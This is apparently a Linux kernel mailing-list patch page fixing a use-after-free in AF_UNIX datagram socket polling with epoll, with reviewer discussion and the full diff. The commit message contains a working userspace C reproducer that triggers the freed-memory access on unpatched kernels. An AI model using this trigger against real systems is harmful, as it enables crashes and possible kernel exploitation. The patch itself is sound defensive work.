
unix: avoid use-after-free in ep_remove_wait_queue

Message ID 87a8qhspfm.fsf@doppelsaurus.mobileactivedefense.com
State Changes Requested, archived
Delegated to: David Miller

Commit Message

Rainer Weikusat Nov. 13, 2015, 6:51 p.m. UTC
An AF_UNIX datagram socket being the client in an n:1 association with
some server socket is only allowed to send messages to the server if
the receive queue of the server socket contains at most
sk_max_ack_backlog datagrams. This implies that prospective writers
might be forced to go to sleep despite none of the messages presently
enqueued on the server receive queue having been sent by them. In order
to ensure that these will be woken up once space becomes available
again, the present unix_dgram_poll routine does a second sock_poll_wait
call with the peer_wait wait queue of the server socket as queue
argument (unix_dgram_recvmsg does a wake up on this queue after a
datagram was received). This is inherently problematic because the
server socket is only guaranteed to remain alive for as long as the
client still holds a reference to it. In case the connection is
dissolved via connect or by the dead peer detection logic in
unix_dgram_sendmsg, the server socket may be freed even though "the
polling mechanism" (in particular, epoll) still holds a pointer to the
corresponding peer_wait queue. There's no way to forcibly deregister a
wait queue with epoll.
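
For illustration, here is a minimal userspace sketch (not part of the
patch; the socket path is made up and error handling is omitted) of one
sequence that can trigger the use-after-free on kernels without the fix:

	#include <string.h>
	#include <unistd.h>
	#include <sys/epoll.h>
	#include <sys/socket.h>
	#include <sys/un.h>

	int main(void)
	{
		struct sockaddr_un sun = { .sun_family = AF_UNIX };
		struct epoll_event ev = { .events = EPOLLOUT };
		int srv, cli, ep;

		strcpy(sun.sun_path, "/tmp/uaf-demo");
		srv = socket(AF_UNIX, SOCK_DGRAM, 0);
		bind(srv, (struct sockaddr *)&sun, sizeof(sun));

		cli = socket(AF_UNIX, SOCK_DGRAM, 0);
		connect(cli, (struct sockaddr *)&sun, sizeof(sun));

		/* fill the server receive queue so that the n:1 flow
		   control condition is hit */
		while (send(cli, "x", 1, MSG_DONTWAIT) == 1)
			;

		/* unix_dgram_poll now does the second sock_poll_wait on
		   the server's peer_wait queue, ie, epoll stores a
		   pointer to it */
		ep = epoll_create1(0);
		epoll_ctl(ep, EPOLL_CTL_ADD, cli, &ev);

		close(srv);
		/* dead peer detection in unix_dgram_sendmsg drops the
		   last reference, freeing the server socket */
		send(cli, "x", 1, MSG_DONTWAIT);

		/* ep_remove_wait_queue now operates on freed memory */
		close(ep);

		unlink("/tmp/uaf-demo");
		return 0;
	}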

Based on an idea by Jason Baron, the patch below changes the code such
that a wait_queue_t belonging to the client socket is enqueued on the
peer_wait queue of the server whenever the peer receive queue full
condition is detected by either a sendmsg or a poll. A wake up on the
peer queue is then relayed to the ordinary wait queue of the client
socket via its wake function. The connection to the peer wait queue is
dissolved again if a wake up is about to be relayed, the client socket
reconnects, a dead peer is detected, or the client socket is itself
closed. This enables removing the second sock_poll_wait from
unix_dgram_poll, thus avoiding the use-after-free, while still ensuring
that no blocked writer sleeps forever.

Signed-off-by: Rainer Weikusat <rweikusat@mobileactivedefense.com>
---
"Believed to be least buggy version"

	- disconnect from former peer in _dgram_connect

        - use unix_state_double_lock in _dgram_sendmsg to ensure
          recv_ready/wake_me preconditions are met (noted by Jason
          Baron)
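
For reference, the unix_state_double_lock helper used above is not new;
it already exists in net/unix/af_unix.c for the benefit of
unix_dgram_connect and takes the two state locks in pointer order so
that concurrent double locks cannot deadlock, roughly:

	static void unix_state_double_lock(struct sock *sk1, struct sock *sk2)
	{
		if (unlikely(sk1 == sk2)) {
			unix_state_lock(sk1);
			return;
		}

		if (sk1 < sk2) {
			unix_state_lock(sk1);
			unix_state_lock_nested(sk2);
		} else {
			unix_state_lock(sk2);
			unix_state_lock_nested(sk1);
		}
	}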


Comments

Jason Baron Nov. 13, 2015, 10:17 p.m. UTC | #1
On 11/13/2015 01:51 PM, Rainer Weikusat wrote:

[...]

>  
> -	if (unix_peer(other) != sk && unix_recvq_full(other)) {
> -		if (!timeo) {
> -			err = -EAGAIN;
> -			goto out_unlock;
> -		}
> +	if (unix_peer(sk) == other && !unix_dgram_peer_recv_ready(sk, other)) {

Remind me why the 'unix_peer(sk) == other' is added here? If the remote
is not connected we still want to make sure that we don't overflow the
remote rcv queue, right?

In terms of this added 'double' lock for both sk and other, where
previously we just held the 'other' lock: I think we could continue to
just hold the 'other' lock unless the remote queue is full, so something
like:

        if (unix_peer(other) != sk && unix_recvq_full(other)) {
                bool need_wakeup = false;

		....skipping the blocking case...

                err = -EAGAIN;
                if (!other_connected)
                        goto out_unlock;
                unix_state_unlock(other);
                unix_state_lock(sk);

		/* if remote peer has changed under us, the connect()
		   will wake up any pending waiter, just return -EAGAIN */

                if (unix_peer(sk) == other) {
			/* In case we see there is space available,
			   queue the wakeup and we will try again. This
			   should be an unlikely condition */
	 		if (!unix_dgram_peer_wake_me(sk, other))
                                need_wakeup = true;
                }
                unix_state_unlock(sk);
                if (need_wakeup)
                        wake_up_interruptible_poll(sk_sleep(sk), POLLOUT |
                                                   POLLWRNORM | POLLWRBAND);
                goto out_free;
        }

So I'm not sure if the 'double' lock really affects any workload, but
the above might be a way to avoid it.

Also, it might be helpful to add a 'Fixes:' tag to the changelog,
referencing where this issue started.

Worth mentioning too is that this patch should improve the polling case
here considerably: we currently wake the entire queue on every remote
read even when we have room in the rcv buffer, so this patch will cut
down the context switching rate dramatically from what we currently have.

Thanks,

-Jason
Rainer Weikusat Nov. 15, 2015, 6:32 p.m. UTC | #2
Jason Baron <jbaron@akamai.com> writes:
> On 11/13/2015 01:51 PM, Rainer Weikusat wrote:
>
> [...]
>
>>  
>> -	if (unix_peer(other) != sk && unix_recvq_full(other)) {
>> -		if (!timeo) {
>> -			err = -EAGAIN;
>> -			goto out_unlock;
>> -		}
>> +	if (unix_peer(sk) == other && !unix_dgram_peer_recv_ready(sk, other)) {
>
> Remind me why the 'unix_peer(sk) == other' is added here? If the remote
> is not connected we still want to make sure that we don't overflow the
> remote rcv queue, right?

Good point. The check is actually wrong there, as the original code
would also check the limit in case of an unconnected send to a socket
found via address lookup. It belongs in the 2nd if (where I originally
put it).

>
> In terms of this added 'double' lock for both sk and other, where
> previously we just held the 'other' lock: I think we could continue to
> just hold the 'other' lock unless the remote queue is full, so something
> like:
>
>         if (unix_peer(other) != sk && unix_recvq_full(other)) {
>                 bool need_wakeup = false;
>
> 		....skipping the blocking case...
>
>                 err = -EAGAIN;
>                 if (!other_connected)
>                         goto out_unlock;
>                 unix_state_unlock(other);
>                 unix_state_lock(sk);

That was my original idea. The problem with this is that the code
starting after the _lock and running until the main code path unlock
has to be executed in one go while the other lock is held, as the
results of the tests above this one may become invalid as soon as the
other lock is released. This means that, instead of continuing with
the send code proper after the block in case other became
receive-ready between the first and the second test (possible because
_dgram_recvmsg does not take the unix state lock), the whole procedure
starting with acquiring the other lock would need to be restarted.
Given sufficiently unfavorable circumstances, this could even turn
into an endless loop which couldn't be interrupted (unless code for
this was added).
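
For concreteness, a sketch (mine, not from the patch) of the
restart-based variant this paragraph argues against:

	restart:
		unix_state_lock(other);

		/* ...tests which are only valid while the other lock
		   is held... */

		if (unix_recvq_full(other)) {
			unix_state_unlock(other);
			unix_state_lock(sk);

			if (unix_peer(sk) == other &&
			    !unix_dgram_peer_wake_me(sk, other)) {
				/* other became receive-ready in between;
				   all earlier tests are stale, so start
				   over - unbounded under sufficiently
				   unfavorable scheduling */
				unix_state_unlock(sk);
				goto restart;
			}
			unix_state_unlock(sk);
		}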

[...]

> we currently wake the entire queue on every remote read even when we
> have room in the rcv buffer, so this patch will cut down the context
> switching rate dramatically from what we currently have.

In my opinion, this could be improved by making the throttling
mechanism work like a flip-flop: if the queue length hits the limit
after a _sendmsg, set a "no more applicants" flag blocking future sends
until it is cleared (checking the flag would replace the present
check). After the receive queue has run empty (or almost empty),
_dgram_sendmsg would clear the flag and do a wake up. But this should
be an independent patch (if implemented).
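
A rough sketch of that flip-flop idea (entirely hypothetical - the
UNIX_NOSPC flag, the flags word and the helper do not exist):

	/* hypothetical bit in a flags word added to struct unix_sock */
	#define UNIX_NOSPC	0

	static int unix_dgram_may_send_to(struct sock *sk, struct sock *other)
	{
		struct unix_sock *u_other = unix_sk(other);

		if (!test_bit(UNIX_NOSPC, &u_other->flags)) {
			if (!unix_recvq_full(other))
				return 1;

			/* limit hit: block all senders until drained */
			set_bit(UNIX_NOSPC, &u_other->flags);
			return 0;
		}

		if (!skb_queue_empty(&other->sk_receive_queue))
			return 0;

		/* queue drained since the flag was set: clear it and
		   wake all blocked writers in one go */
		clear_bit(UNIX_NOSPC, &u_other->flags);
		wake_up_interruptible_poll(&u_other->peer_wait,
					   POLLOUT | POLLWRNORM | POLLWRBAND);
		return 1;
	}
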
Jason Baron Nov. 17, 2015, 4:08 p.m. UTC | #3
On 11/15/2015 01:32 PM, Rainer Weikusat wrote:

> 
> That was my original idea. The problem with this is that the code
> starting after the _lock and running until the main code path unlock
> has to be executed in one go while the other lock is held, as the
> results of the tests above this one may become invalid as soon as the
> other lock is released. This means that, instead of continuing with
> the send code proper after the block in case other became
> receive-ready between the first and the second test (possible because
> _dgram_recvmsg does not take the unix state lock), the whole procedure
> starting with acquiring the other lock would need to be restarted.
> Given sufficiently unfavorable circumstances, this could even turn
> into an endless loop which couldn't be interrupted (unless code for
> this was added).
> 

Hmm - I think we can avoid it by doing the wakeup from the write path
in the rare case that the queue has emptied, and thus avoid the double
lock, i.e.:

                unix_state_unlock(other);
                unix_state_lock(sk);
                err = -EAGAIN;
                if (unix_peer(sk) == other) {
                       unix_dgram_peer_wake_connect(sk, other);
                       if (skb_queue_len(&other->sk_receive_queue) == 0)
                               need_wakeup = true;
                }
                unix_state_unlock(sk);
                if (need_wakeup)
                        wake_up_interruptible_poll(sk_sleep(sk), POLLOUT |
                                                   POLLWRNORM | POLLWRBAND);
                goto out_free;


Thanks,

-Jason
Rainer Weikusat Nov. 17, 2015, 6:38 p.m. UTC | #4
Jason Baron <jbaron@akamai.com> writes:
> On 11/15/2015 01:32 PM, Rainer Weikusat wrote:
>
>> 
>> That was my original idea. The problem with this is that the code
>> starting after the _lock and running until the main code path unlock
>> has to be executed in one go while the other lock is held, as the
>> results of the tests above this one may become invalid as soon as the
>> other lock is released. This means that, instead of continuing with
>> the send code proper after the block in case other became
>> receive-ready between the first and the second test (possible because
>> _dgram_recvmsg does not take the unix state lock), the whole procedure
>> starting with acquiring the other lock would need to be restarted.
>> Given sufficiently unfavorable circumstances, this could even turn
>> into an endless loop which couldn't be interrupted (unless code for
>> this was added).
>> 
>
> Hmm - I think we can avoid it by doing the wakeup from the write path
> in the rare case that the queue has emptied, and thus avoid the double
> lock, i.e.:
>
>                 unix_state_unlock(other);
>                 unix_state_lock(sk);
>                 err = -EAGAIN;
>                 if (unix_peer(sk) == other) {
>                        unix_dgram_peer_wake_connect(sk, other);
>                        if (skb_queue_len(&other->sk_receive_queue) == 0)
>                                need_wakeup = true;
>                 }
>                 unix_state_unlock(sk);
>                 if (need_wakeup)
>                         wake_up_interruptible_poll(sk_sleep(sk), POLLOUT |
>                                                    POLLWRNORM | POLLWRBAND);
>                 goto out_free;

This should probably rather be

if (unix_dgram_peer_wake_connect(sk, other) &&
    skb_queue_len(&other->sk_receive_queue) == 0)
	need_wakeup = 1;

as there's no need to do the wake up if someone else already connected.
And then, the double lock could be avoided at the expense of returning
a gratuitous EAGAIN to the caller and throwing away all of the work
_dgram_sendmsg did so far, eg, allocating an skb, copying the data into
the kernel and doing all the other checks.

This would enable another thread to do one of the following things in
parallel with the 'locked' part of _dgram_sendmsg:

	1) connect sk to a socket != other
        2) use sk to send to a socket != other
        3) do a shutdown on sk
        4) determine write-readyness of sk via poll callback

IMHO, the only thing which could possibly matter is 2), and my
suggestion for that would rather be "use a send socket per sending
thread if this matters to you" than "cause something to fail which
could as well have succeeded".

Patch

diff --git a/include/net/af_unix.h b/include/net/af_unix.h
index b36d837..2a91a05 100644
--- a/include/net/af_unix.h
+++ b/include/net/af_unix.h
@@ -62,6 +62,7 @@  struct unix_sock {
 #define UNIX_GC_CANDIDATE	0
 #define UNIX_GC_MAYBE_CYCLE	1
 	struct socket_wq	peer_wq;
+	wait_queue_t		peer_wake;
 };
 
 static inline struct unix_sock *unix_sk(const struct sock *sk)
diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
index 94f6582..30e7c56 100644
--- a/net/unix/af_unix.c
+++ b/net/unix/af_unix.c
@@ -326,6 +326,122 @@  found:
 	return s;
 }
 
+/* Support code for asymmetrically connected dgram sockets
+ *
+ * If a datagram socket is connected to a socket not itself connected
+ * to the first socket (eg, /dev/log), clients may only enqueue more
+ * messages if the present receive queue of the server socket is not
+ * "too large". This means there's a second writeability condition
+ * poll and sendmsg need to test. The dgram recv code will do a wake
+ * up on the peer_wait wait queue of a socket upon reception of a
+ * datagram, and this wake up needs to be propagated to sleeping
+ * would-be writers since these might not have sent anything so far.
+ * This can't be accomplished via poll_wait because the server socket
+ * might not live as long as its clients if these break their
+ * association with it or if it is closed while clients are still
+ * connected, and there's no way to inform "a polling implementation"
+ * that it should let go of a certain wait queue.
+ *
+ * In order to propagate a wake up, a wait_queue_t of the client
+ * socket, whose wake function does a wake_up on the ordinary client
+ * socket wait queue, is enqueued on the peer_wait queue of the server
+ * socket. This connection is established whenever a write (or a poll
+ * for write) hits the flow control condition and broken when the
+ * association to the server socket is dissolved or after a wake up
+ * was relayed.
+ */
+
+static int unix_dgram_peer_wake_relay(wait_queue_t *q, unsigned mode, int flags,
+				      void *key)
+{
+	struct unix_sock *u;
+	wait_queue_head_t *u_sleep;
+
+	u = container_of(q, struct unix_sock, peer_wake);
+
+	__remove_wait_queue(&unix_sk(u->peer_wake.private)->peer_wait,
+			    q);
+	u->peer_wake.private = NULL;
+
+	/* relaying can only happen while the wq still exists */
+	u_sleep = sk_sleep(&u->sk);
+	if (u_sleep)
+		wake_up_interruptible_poll(u_sleep, key);
+
+	return 0;
+}
+
+static int unix_dgram_peer_wake_connect(struct sock *sk, struct sock *other)
+{
+	struct unix_sock *u, *u_other;
+	int rc;
+
+	u = unix_sk(sk);
+	u_other = unix_sk(other);
+	rc = 0;
+
+	spin_lock(&u_other->peer_wait.lock);
+
+	if (!u->peer_wake.private) {
+		u->peer_wake.private = other;
+		__add_wait_queue(&u_other->peer_wait, &u->peer_wake);
+
+		rc = 1;
+	}
+
+	spin_unlock(&u_other->peer_wait.lock);
+	return rc;
+}
+
+static int unix_dgram_peer_wake_disconnect(struct sock *sk, struct sock *other)
+{
+	struct unix_sock *u, *u_other;
+	int rc;
+
+	u = unix_sk(sk);
+	u_other = unix_sk(other);
+	rc = 0;
+
+	spin_lock(&u_other->peer_wait.lock);
+
+	if (u->peer_wake.private == other) {
+		__remove_wait_queue(&u_other->peer_wait, &u->peer_wake);
+		u->peer_wake.private = NULL;
+
+		rc = 1;
+	}
+
+	spin_unlock(&u_other->peer_wait.lock);
+	return rc;
+}
+
+/* Preconditions for the following two functions:
+ *
+ *	- unix_peer(sk) == other
+ *	- association is stable
+ */
+
+static int unix_dgram_peer_recv_ready(struct sock *sk,
+				      struct sock *other)
+{
+	return unix_peer(other) == sk || !unix_recvq_full(other);
+}
+
+static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other)
+{
+	int connected;
+
+	connected = unix_dgram_peer_wake_connect(sk, other);
+
+	if (unix_recvq_full(other))
+		return 1;
+
+	if (connected)
+		unix_dgram_peer_wake_disconnect(sk, other);
+
+	return 0;
+}
+
 static inline int unix_writable(struct sock *sk)
 {
 	return (atomic_read(&sk->sk_wmem_alloc) << 2) <= sk->sk_sndbuf;
@@ -430,6 +546,8 @@  static void unix_release_sock(struct sock *sk, int embrion)
 			skpair->sk_state_change(skpair);
 			sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP);
 		}
+
+		unix_dgram_peer_wake_disconnect(sk, skpair);
 		sock_put(skpair); /* It may now die */
 		unix_peer(sk) = NULL;
 	}
@@ -664,6 +782,7 @@  static struct sock *unix_create1(struct net *net, struct socket *sock, int kern)
 	INIT_LIST_HEAD(&u->link);
 	mutex_init(&u->readlock); /* single task reading lock */
 	init_waitqueue_head(&u->peer_wait);
+	init_waitqueue_func_entry(&u->peer_wake, unix_dgram_peer_wake_relay);
 	unix_insert_socket(unix_sockets_unbound(sk), sk);
 out:
 	if (sk == NULL)
@@ -1031,6 +1150,13 @@  restart:
 	if (unix_peer(sk)) {
 		struct sock *old_peer = unix_peer(sk);
 		unix_peer(sk) = other;
+
+		if (unix_dgram_peer_wake_disconnect(sk, old_peer))
+			wake_up_interruptible_poll(sk_sleep(sk),
+						   POLLOUT |
+						   POLLWRNORM |
+						   POLLWRBAND);
+
 		unix_state_double_unlock(sk, other);
 
 		if (other != old_peer)
@@ -1548,7 +1674,7 @@  restart:
 		goto out_free;
 	}
 
-	unix_state_lock(other);
+	unix_state_double_lock(sk, other);
 	err = -EPERM;
 	if (!unix_may_send(sk, other))
 		goto out_unlock;
@@ -1562,9 +1688,15 @@  restart:
 		sock_put(other);
 
 		err = 0;
-		unix_state_lock(sk);
 		if (unix_peer(sk) == other) {
 			unix_peer(sk) = NULL;
+
+			if (unix_dgram_peer_wake_disconnect(sk, other))
+				wake_up_interruptible_poll(sk_sleep(sk),
+							   POLLOUT |
+							   POLLWRNORM |
+							   POLLWRBAND);
+
 			unix_state_unlock(sk);
 
 			unix_dgram_disconnected(sk, other);
@@ -1590,21 +1722,27 @@  restart:
 			goto out_unlock;
 	}
 
-	if (unix_peer(other) != sk && unix_recvq_full(other)) {
-		if (!timeo) {
-			err = -EAGAIN;
-			goto out_unlock;
-		}
+	if (unix_peer(sk) == other && !unix_dgram_peer_recv_ready(sk, other)) {
+		if (timeo) {
+			unix_state_unlock(sk);
 
-		timeo = unix_wait_for_peer(other, timeo);
+			timeo = unix_wait_for_peer(other, timeo);
 
-		err = sock_intr_errno(timeo);
-		if (signal_pending(current))
-			goto out_free;
+			err = sock_intr_errno(timeo);
+			if (signal_pending(current))
+				goto out_free;
 
-		goto restart;
+			goto restart;
+		}
+
+		if (unix_dgram_peer_wake_me(sk, other)) {
+			err = -EAGAIN;
+			goto out_unlock;
+		}
 	}
 
+	unix_state_unlock(sk);
+
 	if (sock_flag(other, SOCK_RCVTSTAMP))
 		__net_timestamp(skb);
 	maybe_add_creds(skb, sock, other);
@@ -1618,7 +1756,7 @@  restart:
 	return len;
 
 out_unlock:
-	unix_state_unlock(other);
+	unix_state_double_unlock(sk, other);
 out_free:
 	kfree_skb(skb);
 out:
@@ -2453,14 +2591,16 @@  static unsigned int unix_dgram_poll(struct file *file, struct socket *sock,
 		return mask;
 
 	writable = unix_writable(sk);
-	other = unix_peer_get(sk);
-	if (other) {
-		if (unix_peer(other) != sk) {
-			sock_poll_wait(file, &unix_sk(other)->peer_wait, wait);
-			if (unix_recvq_full(other))
-				writable = 0;
-		}
-		sock_put(other);
+	if (writable) {
+		unix_state_lock(sk);
+
+		other = unix_peer(sk);
+		if (other &&
+		    !unix_dgram_peer_recv_ready(sk, other) &&
+		    unix_dgram_peer_wake_me(sk, other))
+			writable = 0;
+
+		unix_state_unlock(sk);
 	}
 
 	if (writable)